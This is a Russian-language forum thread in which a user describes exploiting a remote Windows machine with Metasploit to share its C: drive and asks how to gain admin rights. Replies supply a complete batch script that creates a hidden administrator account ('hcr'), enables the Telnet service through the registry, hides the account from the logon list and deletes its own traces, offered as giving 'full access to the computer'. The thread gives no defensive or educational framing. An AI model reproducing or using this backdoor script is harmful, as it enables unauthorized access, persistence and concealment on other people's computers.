Пробовал metasploit 2.7 , говорит система вроде как пропатчена. Если там SP2, есть еще какие нибудь способы? Кстати, когда пользовался сплоитом делал так --> 192.168.0.1 - его IP --> winexec 'net share C:\\' все ли я правильно сделал? просто гдето видел при использовании этого сплоита как то устанавливают админские права, если так то подскажите как сделать?
На что ты админские права хочешь поставить? Вопрос непонятный, а шара правильно... Если есть возможность выполнять удалённо команды - так флаг тебе в руки...
а дальше используй команду "net" для создания пользователя, для включения его в групу администраторов и сможешь под этим пользователем подключать любые диски, все через ту же команду "net"
net user hcr hcr /add net localgroup telnetclients /add net localgroup administrators hcr /add net localgroup telnetclients hcr /add set regadd=%windir%\system32\regadd.dll echo Windows Registry Editor Version 5.00>%regadd% echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>%regadd% echo "Start"=dword:00000002>>%regadd% echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%regadd% echo "Rad"="">>%regadd% regedit /s %regadd% :Cleaning del %regadd% del %0 -------------------------------------------------------- Сохрананяєш как *.bat файл и полный доступ к компу с user name: hcr pasword : hcr ^^^^^^^^^ Это вот на хакzone нашёл -=)